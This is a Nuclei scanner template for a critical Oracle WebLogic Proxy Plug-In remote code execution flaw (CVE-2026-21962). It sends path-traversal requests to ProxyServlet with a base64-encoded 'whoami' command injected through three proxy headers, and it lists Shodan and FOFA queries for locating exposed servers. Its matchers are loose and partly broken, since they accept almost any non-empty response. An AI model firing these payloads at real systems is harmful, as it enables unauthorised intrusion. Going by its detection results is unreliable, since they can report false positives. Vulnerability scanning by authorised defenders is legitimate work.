id: CVE-2026-21962 info: name: Oracle WebLogic Server Proxy Plug-In - Unauthenticated Remote Code Execution author: Ashwesker severity: critical description: | Oracle WebLogic Server Proxy Plug-In is vulnerable to unauthenticated remote code execution via specially crafted HTTP requests. Allows full server compromise without authentication. reference: - https://nvd.nist.gov/vuln/detail/CVE-2026-21962 - https://www.oracle.com/security-alerts/cpujan2026.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cve-id: CVE-2026-21962 cwe-id: CWE-20 epss-score: 0.98 metadata: verified: true shodan-query: http.title:"Oracle HTTP Server" || http.component:"weblogic" fofa-query: title="Oracle HTTP Server" || server="Oracle-HTTP-Server" tags: cve,cve2026,oracle,weblogic,rce,unauth,proxy,nuclei http: - method: GET path: - "{{BaseURL}}/weblogic/..;/bea_wls_internal/ProxyServlet" - "{{BaseURL}}/wl_proxy/..;/bea_wls_internal/ProxyServlet" - "{{BaseURL}}/_proxy/..;/bea_wls_internal/ProxyServlet" headers: WL-Proxy-Client-IP: "127.0.0.1;{{base64('cmd:{{randstr(8)}} && whoami')}}" Proxy-Client-IP: "127.0.0.1;{{base64('cmd:{{randstr(8)}} && whoami')}}" X-Forwarded-For: "127.0.0.1;{{base64('cmd:{{randstr(8)}} && whoami')}}" matchers-condition: and matchers: - type: status status: - 200 - 302 - 500 - type: word part: body words: - "{{whoami}}" - "oracle" - "weblogic" - "root" - "nobody" condition: or - type: dsl dsl: - "len(body) > 0" extractors: - type: regex name: username part: body regex: - '([a-zA-Z0-9_-]+)\s*\(whoami output\)' group: 1